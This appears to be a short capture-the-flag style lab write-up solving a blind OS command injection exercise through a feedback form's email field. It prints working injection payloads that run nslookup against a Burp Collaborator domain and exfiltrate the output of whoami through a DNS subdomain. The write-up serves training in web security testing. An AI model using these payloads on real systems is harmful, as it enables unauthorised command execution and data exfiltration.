
This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.


Just like the last lab related OOB interaction, we can use the same following payload || nslookup m0nc1evdkdpq2lzcalmyvzxnmes6gw4l.oastify.com || and pass this through the email field and let’s check whether any interactions

Awesome, we got the DNS interaction

Now, let’s kinda fine tune the payload like || nslookup $(whoami).m0nc1evdkdpq2lzcalmyvzxnmes6gw4l.oastify.com || where the backticks or even $(whoami) will act as a inline execution of bash commands over there

Resend the payload through the email field and looking into the collaborator found that the whoami executed

whoami command resulted in peter-iAmZjL and submitting as solution.. Solves the lab